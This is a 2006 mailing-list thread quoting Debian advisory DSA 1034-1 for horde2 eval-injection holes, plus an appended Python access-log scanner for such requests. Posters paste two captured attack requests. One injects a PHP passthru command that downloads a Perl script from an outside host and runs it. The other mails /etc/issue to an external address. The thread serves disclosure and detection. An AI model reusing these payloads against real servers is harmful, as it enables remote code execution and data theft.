Message-ID: <1145027688.17039.43.camel@Stargate.iatechconsulting.com>
Date: Fri Apr 14 16:07:04 2006
From: nodialtone at comcast.net (Byron Copeland)
Subject: [SECURITY] [DSA 1034-1] New horde2 packages fix several vulnerabilities
Here's another attempt:
GET /horde//services/help/?show=about&module=;%22
.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).
%22dary.6te.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22dary.6te.net%
22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22dary.6te.net%22.chr(47).%22h;perl%20h
;rm%20-rf%20h*%22);'. HTTP/1.1" 404 77 "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows 98)"
:)
On Fri, 2006-04-14 at 10:49, <...> wrote:
> <from [funsec]>
> (thx Henderson, Dennis K.)
>
> Which web server would be a target for this GET?
>
> Not sure what group to post this to but I'm sure having fun watching the
> attempts..
>
> :)
>
>
>
>
> GET
> /horde2/services/help/?show=about&module=;%22.passthru(%22cat%20%22.chr(
> 47).%22etc%22.chr(47).%22issue%20%7Cmail%20-s%20ho2%20p0wd3r31337@...il.
> com%22);'. HTTP/1.1
> Accept: */*
> Accept-Language: en-us
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
> Host: x.x.x.x
> Connection: Close
>
> </from [funsec]>
>
> ----- Original Message -----
> From: "Moritz Muehlenhoff" <jmm@...ian.org>
> To: <debian-security-announce@...ts.debian.org>
> Sent: Friday, April 14, 2006 4:42 PM
> Subject: [Full-disclosure] [SECURITY] [DSA 1034-1] New horde2 packages fix several vulnerabilities
>
>
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > - --------------------------------------------------------------------------
> > Debian Security Advisory DSA 1034-1 security@...ian.org
> > http://www.debian.org/security/ Moritz Muehlenhoff
> > April 14th, 2006 http://www.debian.org/security/faq
> > - --------------------------------------------------------------------------
> >
> > Package : horde2
> > Vulnerability : several
> > Problem-Type : remote
> > Debian-specific: no
> > CVE ID : CVE-2006-1260 CVE-2006-1491
> >
> > Several remote vulnerabilities have been discovered in the Horde web
> > application framework, which may lead to the execution of arbitrary
> > web script code. The Common Vulnerabilities and Exposures project
> > identifies the following problems:
> >
> > CVE-2006-1260
> >
> > Null characters in the URL parameter bypass a sanity check, which
> > allowed remote attackers to read arbitrary files, which allowed
> > information disclosure.
> >
> > CVE-2006-1491
> >
> > User input in the help viewer was passed unsanitised to the eval()
> > function, which allowed injection of arbitrary web code.
> >
> >
> > The old stable distribution (woody) doesn't contain horde2 packages.
> >
> > For the stable distribution (sarge) these problems have been fixed in
> > version 2.2.8-1sarge2.
> >
> > The unstable distribution (sid) no longer contains horde2 packages.
> >
> > We recommend that you upgrade your horde2 package.
> >
> >
> > Upgrade Instructions
> > - --------------------
> >
> > wget url
> > will fetch the file for you
> > dpkg -i file.deb
> > will install the referenced file.
> >
> > If you are using the apt-get package manager, use the line for
> > sources.list as given below:
> >
> > apt-get update
> > will update the internal database
> > apt-get upgrade
> > will install corrected packages
> >
> > You may use an automated update by adding the resources from the
> > footer to the proper configuration.
> >
> >
> > Debian GNU/Linux 3.1 alias sarge
> > - --------------------------------
> >
> > Source archives:
> >
> >
> > http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2.dsc
> > Size/MD5 checksum: 575 acf3f1924f04e2faddfd06ba9b01820e
> >
> > http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2.diff.gz
> > Size/MD5 checksum: 39504 fb338c016b70e69fa4b867fa116b86dc
> >
> > http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8.orig.tar.gz
> > Size/MD5 checksum: 683005 89961af4e4488a908147d7b3a0dc3b44
> >
> > Architecture independent components:
> >
> >
> > http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2_all.deb
> > Size/MD5 checksum: 721398 35fa1bf8bf8b4f2be1076501b984367a
> >
> >
> > These files will probably be moved into the stable distribution on
> > its next update.
> >
> > - ---------------------------------------------------------------------------------
> > For apt-get: deb http://security.debian.org/ stable/updates main
> > For dpkg-ftp: ftp://security.debian.org/debian-security
> > dists/stable/updates/main
> > Mailing list: debian-security-announce@...ts.debian.org
> > Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
> > -----BEGIN PGP SIGNATURE-----
> > Version: GnuPG v1.4.3 (GNU/Linux)
> >
> > iD8DBQFEP7SJXm3vHE4uyloRAsVVAJ4n9UoO57tJYCw1JePujnjy90XFvACg3DLn
> > nrfwvObZjSThW+pXcD8NI38=
> > =BIdm
> > -----END PGP SIGNATURE-----
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
>
>
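Added example, not part of the original thread or of Horde: a small access-log check for the help-viewer requests quoted above, which percent-decodes the module parameter and reports any value that is not a plain identifier, together with the response status. The identifier pattern, the combined log format and the sample lines (documentation addresses, placeholder command) are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Combined-log request field followed by the status code.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# Help viewer path as seen in the requests above.
HELP_PATH = re.compile(r"/services/help/?$")
# Assumption: a legitimate module name is a short plain identifier.
SAFE_MODULE = re.compile(r"[A-Za-z0-9_-]{1,32}")

def module_values(query):
    """Yield the percent-decoded value of every `module` parameter."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if unquote(key) == "module":
            yield unquote(value)

def scan_line(line):
    """Return (decoded module value, HTTP status) for a suspicious
    help-viewer request, or None for anything else."""
    hit = REQUEST.search(line)
    if not hit:
        return None
    target, status = hit.group(1), int(hit.group(2))
    path, _, query = target.partition("?")
    # Collapse doubled slashes ("/horde//services/...") before matching.
    if not HELP_PATH.search(re.sub(r"/+", "/", unquote(path))):
        return None
    for value in module_values(query):
        if not SAFE_MODULE.fullmatch(value):
            return value, status
    return None

def scan(lines):
    return [r for r in map(scan_line, lines) if r is not None]

# Constructed sample lines: benign help request, injection-shaped request,
# and an unrelated page that happens to carry a `module` parameter.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Apr/2006:10:00:01 +0000] "GET /horde/services/help/?show=about&module=imp HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.66 - - [14/Apr/2006:10:00:07 +0000] "GET /horde//services/help/?show=about&module=;%22.passthru(%22PLACEHOLDER%22);\'. HTTP/1.1" 404 77 "-" "-"',
    '192.0.2.10 - - [14/Apr/2006:10:00:09 +0000] "GET /horde/imp/mailbox.php?module=;x HTTP/1.1" 200 90 "-" "-"',
]

if __name__ == "__main__":
    for value, status in scan(SAMPLE_LOG):
        note = "answered 2xx, check the host" if 200 <= status < 300 else "not served"
        print(f"{status} {note}: module={value!r}")
```

A hit with a 2xx status on a host still running a horde2 version older than 2.2.8-1sarge2 deserves a closer look than the 404 shown in the log line above.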